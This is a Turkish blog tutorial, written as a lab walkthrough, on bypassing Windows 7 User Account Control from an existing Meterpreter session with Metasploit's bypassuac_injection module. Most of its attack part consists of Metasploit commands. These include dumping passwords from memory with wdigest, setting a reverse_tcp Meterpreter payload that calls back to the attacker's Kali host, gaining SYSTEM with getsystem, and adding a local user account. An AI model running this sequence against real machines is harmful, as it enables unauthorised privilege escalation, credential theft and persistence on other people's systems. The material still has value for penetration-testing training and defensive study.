Meterpreter Oturumu Elde Edilmiş Windows İşletim Sisteminde MSF bypassuac_injection İstismar Modülü Kullanılarak UAC Korumasının Atlatılması

Windows işletim sisteminde yerel yönetici gibi yetkili bir hesabın hakları ile ele geçirilen Meterpreter oturumda, UAC (User Account Control) etkin iken bazı işlemler (kullanıcı ekleme, kayıt defterinde güncelleme,… gibi) gerçekleştirilemez. Yönetici haklarına sahip olunsa bile UAC etkin olduğu durumda kullanıcıdan onay alınması gibi bir koruma mekanizması sağladığı için UAC korumasının atlatılması gerekir. Bu yazıda, yerel yönetici hakları ile Meterpreter bağlantısı elde edilmiş ve UAC koruması etkin olan bir Windows bilgisayarda MSF bypassuac_injection istismar modülü kullanılarak UAC koruması atlatılacak ve yönetici onayına sorulmadan yönetimsel işlemler gerçekleştirilebilecektir.

192.168.74.132 IP adresli Windows 7 bilgisayara 192.168.74.130 IP adresli Kali bilgisayar üzerinden oturum ID değeri 1 olan ve “Yonetici” adlı bir yerel yönetici haklarına sahip kullanıcı hesabı ile Meterpreter bağlantısı açılmış olsun.

bypassing-uac-and-obtaining-admin-privileges-in-windows-7-using-msf-bypassuac-injection-exploit-module-01

Bu kullanıcının hakları ile SYSTEM haklarına sahip olunmaya çalışıldığında, SYSTEM yetkisiyle çalışan prosesler listelenmeye çalışıldığında, RAM üzerinde kayıtlı parolalar elde edilmek istendiğinde, kayıt defterinde güncelleme yapılmak istendiğinde yetkinin olmadığına dair bir hata mesajı alınmakta veya işlemler beklendiği gibi gerçekleşmemektedir.

sessions -i 1
getuid
getsystem
ps -s
wdigest

bypassing-uac-and-obtaining-admin-privileges-in-windows-7-using-msf-bypassuac-injection-exploit-module-02

Mevcut oturumdaki yetkiler listelenmek istendiğinde kullanıcı yerel yönetici haklarına sahip olduğu halde Admin (ve SYSTEM) kapsamında işlem yapamayacağı görülmektedir. Bunun yanında UAC korumasının etkin olduğu da görülmektedir.

run post/windows/gather/win_privs

bypassing-uac-and-obtaining-admin-privileges-in-windows-7-using-msf-bypassuac-injection-exploit-module-03

Windows komut satırı elde edildikten sonra, yeni bir kullanıcı oluşturulmak istendiğinde de yetki hatası alınmaktadır.

shell
net localgroup Administrator
net user Test Tt123456 /add

bypassing-uac-and-obtaining-admin-privileges-in-windows-7-using-msf-bypassuac-injection-exploit-module-04

Windows Vista ve sonraki sürüm Windows işletim sistemlerinde UAC varsayılan durumda (Default) iken, yönetimsel işlemler için kullanıcıdan onay istenir. Son kullanıcıdan onay alındığında bu işlemler gerçekleştirilebilir. Yukarıdaki hataların sebebi de bu korumadan kaynaklanmaktadır.

bypassing-uac-and-obtaining-admin-privileges-in-windows-7-using-msf-bypassuac-injection-exploit-module-05

UAC korumasını atlatabilmek için MSF bypassuac_injection istismar modülü kullanılabilir. Bu amaçla modül seçilir ve seçenekleri incelenir.

exit
background
search bypassuac_injection
use exploit/windows/local/bypassuac_injection
show options

bypassing-uac-and-obtaining-admin-privileges-in-windows-7-using-msf-bypassuac-injection-exploit-module-06

Modüle oturum ID değeri ve uygun bir payload verilerek UAC koruması RAM üzerinde devre dışı bırakılmış olan yeni bir oturum elde edilebilir. Seçenekler ayarlanırken, ters bağlantı (reverse connection) sağlayan bir Payload kullanılacaksa, LPORT seçeneğine boşta olan bir port verilmesi gerektiği unutulmamalıdır.

set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.74.130
set LPORT 8443
show options

bypassing-uac-and-obtaining-admin-privileges-in-windows-7-using-msf-bypassuac-injection-exploit-module-07

Seçenekler ayarlandıktan sonra, modül çalıştırılır ve istismar işlemi gerçekleştirilir. Böylece, UAC koruması atlatılmış olan yeni bir Meterpreter bağlantısı elde edilir.

exploit

bypassing-uac-and-obtaining-admin-privileges-in-windows-7-using-msf-bypassuac-injection-exploit-module-08

Notlar:

  • Yerleşik yerel yönetici kullanıcısına ait hesap (Built-in Administrator), UAC korumasından muaf olduğu için MSF bypassuac_injection istismar modülünün kullanılmasına gerek yoktur.
  • Modülün çalıştırılması ile işletim sisteminde UAC koruması devre dışı bırakılmaz, sadece mevcut oturumda (RAM üzerinde) UAC koruması atlatılır.
  • UAC koruma seviyesi “Always notify” seviyesinde iken bu modül başarılı olarak çalışamamaktadır.

Modül çalıştırıldığında yönetici hakları ile işlemlerin gerçekleştirilebileceği yeni bir oturumun elde edildiği görülmektedir.

run post/windows/gather/win_privs

bypassing-uac-and-obtaining-admin-privileges-in-windows-7-using-msf-bypassuac-injection-exploit-module-09

Elde edilen yeni yetkilerle yönetici onayına gerek kalmadan SYSTEM hkları ile çalışan prosesler listelenebilir veya SYSTEM yetkileri elde edilebilir.

ps -s
getsystem

bypassing-uac-and-obtaining-admin-privileges-in-windows-7-using-msf-bypassuac-injection-exploit-module-10

Benzer olarak, yeni bir yerel hesap oluşturulabilmektedir.

shell
net user Test Tt123456 /add

bypassing-uac-and-obtaining-admin-privileges-in-windows-7-using-msf-bypassuac-injection-exploit-module-11

 

Kaynak:

https://cyberarms.wordpress.com/2015/07/04/system-level-access-and-plain-text-passwords-using-bypass-uac-and-mimikatz/
https://sathisharthars.wordpress.com/2014/06/19/bypass-uac-and-get-admin-privilege-in-windows-7-using-metasploit/

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.